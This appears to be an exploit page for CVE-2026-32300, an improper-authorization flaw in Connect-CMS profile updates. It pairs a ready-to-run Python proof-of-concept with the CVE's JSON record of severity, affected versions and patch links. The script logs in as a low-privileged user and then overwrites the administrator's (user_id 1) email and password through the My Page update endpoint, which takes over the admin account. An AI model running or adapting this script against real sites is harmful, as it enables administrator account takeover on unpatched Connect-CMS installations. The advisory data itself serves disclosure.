CVE-2026-32300

import requests # Target configuration target_url = "http://target.com" login_endpoint = "/index.php?account=login" update_endpoint = "/index.php?account=my_page/update" # Attacker credentials attacker_user = "lowpriv_user" attacker_pass = "password" # Create a session to maintain cookies session = requests.Session() # Step 1: Authenticate as a low-privileged user login_payload = { "account": attacker_user, "password": attacker_pass } response = session.post(target_url + login_endpoint, data=login_payload) if response.status_code != 200: print("[!] Login failed") exit() print("[+] Login successful") # Step 2: Exploit Improper Authorization (IDOR) # The attacker attempts to update the profile of user_id '1' (usually Admin) # by sending a crafted request to the 'My Page' update feature. exploit_payload = { "user_id": "1", # Target user ID to modify "email": "[email protected]", "password": "new_hacked_password" } print(f"[*] Attempting to modify user_id 1 profile...") exploit_response = session.post(target_url + update_endpoint, data=exploit_payload) if exploit_response.status_code == 200 and "success" in exploit_response.text.lower(): print("[+] Exploit successful! Arbitrary user information modified.") else: print("[-] Exploit failed or patch is applied.")

{"cve": {"id": "CVE-2026-32300", "sourceIdentifier": "[email protected]", "published": "2026-03-23T22:16:27.933", "lastModified": "2026-03-24T20:40:41.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, an improper authorization issue in the My Page profile update feature may allow modification of arbitrary user information. Versions 1.41.1 and 2.41.1 contain a patch."}, {"lang": "es", "value": "Connect-CMS es un sistema de gestión de contenido. En versiones de la serie 1.x hasta la 1.41.0 inclusive y versiones de la serie 2.x hasta la 2.41.0 inclusive, un problema de autorización impropia en la función de actualización de perfil Mi Página puede permitir la modificación de información de usuario arbitraria. Las versiones 1.41.1 y 2.41.1 contienen un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.41.1", "matchCriteriaId": "60B8BBDF-82BD-486D-AE17-7F59360E62C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.41.1", "matchCriteriaId": "0C11B4F0-DF29-473A-A285-9DA152DDCDE1"}]}]}], "references": [{"url": "https://github.com/opensource-workshop/connect-cms/commit/7c9951738c62a1d51b91e9956d1eb756c5d52cce", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v1.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v2.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-qr6x-wvxr-8hm9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}